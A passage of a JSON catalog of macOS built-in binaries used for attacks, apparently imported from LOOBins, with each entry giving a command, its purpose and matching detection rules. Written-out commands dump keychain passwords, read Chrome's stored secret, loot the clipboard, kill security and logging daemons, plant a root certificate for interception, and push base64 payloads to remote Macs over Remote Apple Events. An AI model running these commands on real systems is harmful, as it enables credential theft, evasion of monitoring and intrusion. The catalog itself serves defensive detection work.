Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:a3236c80ab72db2e","toolId":"loobins:osascript","toolName":"osascript","name":"Remote payload deployment via Terminal.app as a Remote Apple Events proxy","source":"LOOBins","platform":["macOS"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Execution","Lateral Movement"],"command":"osascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"echo \\\"${PAYLOAD_B64}\\\" | base64 --decode > ${REMOTE_SCRIPT_PATH} && chmod +x ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF\n\nosascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"bash ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF","description":"The System Events application blocks remote do shell script execution via Remote Apple Events (RAE), returning a -10016 Handler Error. Terminal.app does not have this restriction and accepts remote do script commands over the eppc:// protocol. This makes Terminal.app an effective execution proxy. Payloads are Base64-encoded before transmission to avoid AppleScript parsing errors (-2741) caused by multi-line scripts. The deployment is a two-stage process - the first RAE command decodes the payload to a temporary path and sets execute permissions, and the second invokes it via bash. This technique can also be classified as a Software Deployment Tool (T1072) - it operates via Apple Events IPC rather than standard shell processes, creating a telemetry gap in security tooling focused on process execution trees.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:osascript:c01ea000e14e56db","toolId":"loobins:osascript","toolName":"osascript","name":"Remote volume enumeration via Finder over Remote Apple Events","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"osascript -e 'tell application \"Finder\" of machine \"eppc://user:password@<TARGET_IP>\" to get name of every disk'","description":"The Finder application is scriptable over Remote Apple Events (RAE) via the eppc:// URI scheme. osascript can address a remote Finder instance to query mounted volumes on the target machine, providing an adversary with immediate insight into available network shares and external storage. These actions are performed via Apple Events IPC rather than shell commands, bypassing security telemetry focused on process execution.","mitre":[],"fullPath":["/usr/bin/osascript"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)","value":"Command Line Argument Detection (args contain osascript AND -e AND clipboard)"},{"type":"Jamf Protect: Detect activity that is related to osascript gathering clipboard content","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml"},{"type":"Jamf Protect: Detect activity that is related to osascript pulling system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml"},{"type":"Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml"},{"type":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)","value":"Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)"},{"type":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications","value":"Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pbpaste:652de80e6c1533ef","toolId":"loobins:pbpaste","toolName":"pbpaste","name":"Use pbpaste to collect sensitive clipboard data","source":"LOOBins","platform":["macOS"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"while true; do echo $(pbpaste) >> loot.txt; sleep 10; done","description":"A pbpaste bash loop can continuously collect clipboard contents every x minutes and write contents to a file (or another location). This may allow an attacker to gather user credentials or collect other sensitive information.","mitre":[],"fullPath":["/usr/bin/pbpaste"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Clipboard Data Collection Via Pbpaste","value":"https://github.com/SigmaHQ/sigma/blob/master/rules-threat-hunting/macos/process_creation/proc_creation_macos_pbpaste_execution.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pbpaste.yml","https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-b65"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pkill:1fe342f7502ca679","toolId":"loobins:pkill","toolName":"pkill","name":"Kill security tools","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"pkill -f \"Little Snitch|ESET|osqueryd|Falcon\"","description":"Terminate defensive processes like firewalls, AV, or monitoring tools.","mitre":[],"fullPath":["/usr/bin/pkill"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process execution monitoring for pkill","value":"Process execution monitoring for pkill"},{"type":"Endpoint Detection - pkill targeting security tools","value":"Endpoint Detection - pkill targeting security tools"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pkill:5a5a01fbc83306af","toolId":"loobins:pkill","toolName":"pkill","name":"Force kill processes with SIGKILL","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"pkill -9 osqueryd","description":"Use the -9 signal to forcefully terminate processes that may not respond to normal termination signals. Useful for killing hung security tools.","mitre":[],"fullPath":["/usr/bin/pkill"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process execution monitoring for pkill","value":"Process execution monitoring for pkill"},{"type":"Endpoint Detection - pkill targeting security tools","value":"Endpoint Detection - pkill targeting security tools"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pkill:c051aba20a9aac26","toolId":"loobins:pkill","toolName":"pkill","name":"Kill all processes for a user","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion","Impact"],"command":"pkill -u username","description":"Terminate all processes belonging to a specific user, potentially ending user sessions or disrupting monitoring.","mitre":[],"fullPath":["/usr/bin/pkill"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process execution monitoring for pkill","value":"Process execution monitoring for pkill"},{"type":"Endpoint Detection - pkill targeting security tools","value":"Endpoint Detection - pkill targeting security tools"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pkill:3f61e8515e59c3e8","toolId":"loobins:pkill","toolName":"pkill","name":"Kill logging and monitoring daemons","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"pkill -f \"syslog|auditd|osqueryd|esensor|nessusd\"","description":"Terminate system logging and monitoring processes to evade detection.","mitre":[],"fullPath":["/usr/bin/pkill"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process execution monitoring for pkill","value":"Process execution monitoring for pkill"},{"type":"Endpoint Detection - pkill targeting security tools","value":"Endpoint Detection - pkill targeting security tools"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:pkill:3b9d034ed0f34b48","toolId":"loobins:pkill","toolName":"pkill","name":"Kill process by exact name match","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion","Impact"],"command":"pkill -x com.apple.Safari","description":"Use exact matching with -x flag to kill specific process by exact name rather than pattern.","mitre":[],"fullPath":["/usr/bin/pkill"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Process execution monitoring for pkill","value":"Process execution monitoring for pkill"},{"type":"Endpoint Detection - pkill targeting security tools","value":"Endpoint Detection - pkill targeting security tools"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:plutil:924262c1c30d2ac6","toolId":"loobins:plutil","toolName":"plutil","name":"Set app to run with dock icon hidden","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"plutil -insert LSUIElement -string \"1\" /Applications/TargetApp.app/Contents/Info.plist","description":"plutil can be used to set the \"LSUIElement\" attribute to true which will force the targeted app to run without the UI and dock icon.","mitre":[],"fullPath":["/usr/bin/plutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Splunk Security Content: MacOS plutil","value":"https://research.splunk.com/endpoint/c11f2b57-92c1-4cd2-b46c-064eafb833ac/"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/plutil.yml","https://scriptingosx.com/2016/11/editing-property-lists/","https://attack.mitre.org/techniques/T1647/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:profiles:d0384102b00daeed","toolId":"loobins:profiles","toolName":"profiles","name":"Collect system DEP information.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sudo profiles show -type enrollment","description":"The following command determines whether device is DEP(Device Enrolment Program) enabled and output the DEP information.","mitre":[],"fullPath":["/usr/bin/profiles"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing.","value":"No detections at time of publishing."}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:profiles:eb38ca70e6c00880","toolId":"loobins:profiles","toolName":"profiles","name":"Remove configuration profiles.","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Impact"],"command":"profiles remove -identifier com.profile.identifier -password <password>","description":"The following command deletes the specified profiles. An optional password used when removing a configuration profile which requires the password removal option.","mitre":[],"fullPath":["/usr/bin/profiles"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing.","value":"No detections at time of publishing."}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:safaridriver:3df2d8c33d88e234","toolId":"loobins:safaridriver","toolName":"safaridriver","name":"Enable safaridriver","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control","Exfiltration"],"command":"sudo safaridriver --enable","description":"The following command can be used to enable the WebDriver Safari browser API. The command must be run as root or with sudo privileges.","mitre":[],"fullPath":["/System/Cryptexes/App/usr/bin/safaridriver","/usr/bin/safaridriver"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/safaridriver.yml","https://developer.apple.com/documentation/webkit/about_webdriver_for_safari","https://starlabs.sg/blog/2021/04-you-talking-to-me/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:say:6807eaa8653a2f11","toolId":"loobins:say","toolName":"say","name":"Read sensitive data","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion","Collection"],"nativeCategory":["Defense Evasion","Collection"],"command":"say -f /home/user/sensitive-files -i > loot.txt;","description":"The following command can read and process sensitive files and redirects the output to a file..","mitre":[],"fullPath":["/usr/bin/say"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content available","value":"No detection content available"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml","https://ss64.com/osx/say.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:say:7ef0bb01f0a5efcf","toolId":"loobins:say","toolName":"say","name":"Collect clipboard data","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion","Discovery","Collection"],"nativeCategory":["Defense Evasion","Reconnaissance","Discovery","Collection"],"command":"osascript -e 'set volume output muted true' ; say $(pbpaste) -i > loot.txt;","description":"The command is designed to enhance privacy by muting the system volume,using a less recognizable \"Whisper\" voice with the \"say\" command, processing the copied text in the clipboard, and saving the output to a file named \"loot.txt.\"","mitre":[],"fullPath":["/usr/bin/say"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detection content available","value":"No detection content available"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml","https://ss64.com/osx/say.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:screencapture:1c0650f3bbaf5b35","toolId":"loobins:screencapture","toolName":"screencapture","name":"Continuously capture screenshots","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection"],"command":"while true; do ts=$(date +\"%Y%m%d-%H%M%S\"); o=\"/tmp/screenshots\"; screencapture -x \"$o/ss-$ts.png\"; sleep 10; done","description":"The following command demonstrates how an attacker can use the tool to capture screenshots every 10 seconds. The -x flag prevents snapshot sounds from being played.","mitre":[],"fullPath":["/usr/sbin/screencapture"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Screen Capture - macOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/screencapture.yml","https://ss64.com/osx/screencapture.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:scutil:8bc671e538a2f395","toolId":"loobins:scutil","toolName":"scutil","name":"DNS configuration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"scutil --dns","description":"Get the current DNS configuration of the systems","mitre":[],"fullPath":["/usr/bin/scutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml","https://macosbin.com/bin/scutil","https://ss64.com/osx/scutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:scutil:66290cdfc7045939","toolId":"loobins:scutil","toolName":"scutil","name":"Proxy configuration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"scutil --proxy","description":"Get the current proxy configuration of the systems","mitre":[],"fullPath":["/usr/bin/scutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml","https://macosbin.com/bin/scutil","https://ss64.com/osx/scutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:scutil:a42e857b47431b0e","toolId":"loobins:scutil","toolName":"scutil","name":"Network reachability","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"scutil -r { nodename | address | local-address remote-address }","description":"Check if the destination host is reachable from your Mac","mitre":[],"fullPath":["/usr/bin/scutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml","https://macosbin.com/bin/scutil","https://ss64.com/osx/scutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:scutil:c8f9a92cde041427","toolId":"loobins:scutil","toolName":"scutil","name":"Hostname, localhost name and computername","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"scutil --get { HostName | LocalHostName | ComputerName }","description":"Display the current hostname, localhost name and computername","mitre":[],"fullPath":["/usr/bin/scutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml","https://macosbin.com/bin/scutil","https://ss64.com/osx/scutil.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:security:2eedc72739c333fe","toolId":"loobins:security","toolName":"security","name":"Dump credentials, keys, certificates, and other sensitive information from Keychain","source":"LOOBins","platform":["macOS"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"sudo security dump-keychain -d login.keychain","description":"This command will dump keychain passwords from login.keychain","mitre":[],"fullPath":["/usr/bin/security"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Credentials from Password Stores - Keychain","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"},{"type":"Elastic: Access to Keychain Credentials Directories","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml"},{"type":"Elastic: Credential Access Dumping Keychain Security","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml"},{"type":"Elastic: Keychain Password Retrieval via Command Line","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml"},{"type":"Jamf Protect: Detect Keychain dumping using security","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml","https://www.netmeister.org/blog/keychain-passwords.html","https://ss64.com/osx/security.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:security:81de7ed93c807a66","toolId":"loobins:security","toolName":"security","name":"Retrieve Chrome's \"Chrome Safe Storage\" password manager secret","source":"LOOBins","platform":["macOS"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"security find-generic-password -w -s \"Chrome Safe Storage\"","description":"This command will retrieve the Chrome Safe Storage password manager secret from the keychain.","mitre":[],"fullPath":["/usr/bin/security"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Credentials from Password Stores - Keychain","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"},{"type":"Elastic: Access to Keychain Credentials Directories","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml"},{"type":"Elastic: Credential Access Dumping Keychain Security","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml"},{"type":"Elastic: Keychain Password Retrieval via Command Line","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml"},{"type":"Jamf Protect: Detect Keychain dumping using security","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml","https://www.netmeister.org/blog/keychain-passwords.html","https://ss64.com/osx/security.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:security:81b1fcfde9e5f88c","toolId":"loobins:security","toolName":"security","name":"Add an arbitrary trusted certificate to aid a MITM attack","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain bad_cert.crt","description":"This command will add a certificate to the keychain.","mitre":[],"fullPath":["/usr/bin/security"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Credentials from Password Stores - Keychain","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"},{"type":"Elastic: Access to Keychain Credentials Directories","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_credentials_keychains.toml"},{"type":"Elastic: Credential Access Dumping Keychain Security","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_dumping_keychain_security.toml"},{"type":"Elastic: Keychain Password Retrieval via Command Line","value":"https://github.com/elastic/detection-rules/blob/main/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml"},{"type":"Jamf Protect: Detect Keychain dumping using security","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/keychain_dumped"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml","https://www.netmeister.org/blog/keychain-passwords.html","https://ss64.com/osx/security.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sfltool:1a930e98a41d0d09","toolId":"loobins:sfltool","toolName":"sfltool","name":"Display Login Items","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sfltool dumpbtm","description":"Identify all current login and background items configured on the system.","mitre":[],"fullPath":["/usr/bin/sfltool"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml","https://www.unix.com/man-page/mojave/1/sfltool/","https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sfltool:d845cfd089e6a465","toolId":"loobins:sfltool","toolName":"sfltool","name":"Reset Login Items to Defaults","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"sfltool resetbtm","description":"Reset all third-party Login Items and revert to installation defaults.","mitre":[],"fullPath":["/usr/bin/sfltool"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect attempts to dump BTM or being reverted to installation defaults","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sfltool_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml","https://www.unix.com/man-page/mojave/1/sfltool/","https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sharing:a3a779c08185c705","toolId":"loobins:sharing","toolName":"sharing","name":"Create an SMB share on a target over SSH for lateral tool transfer","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"# On target (via SSH): create share directory, start smbd, create the share\nssh user@<TARGET_IP> 'mkdir -p ~/share && sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smbd.plist && sudo sharing -a /Users/user/share -n share -s 001'\n\n# On attacker: mount the share using osascript and transfer a file\nosascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'\ncp payload.sh /Volumes/share/","description":"With SSH access to the target, the sharing utility can create an SMB share pointing to a directory on the target. Combined with the macOS smbd LaunchDaemon, the share becomes accessible over the network. The attacker can then mount the share using osascript and copy files directly into it, which appear immediately in the target's share directory. The -s 001 flag enables SMB access on the share.","mitre":[],"fullPath":["/usr/sbin/sharing"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of 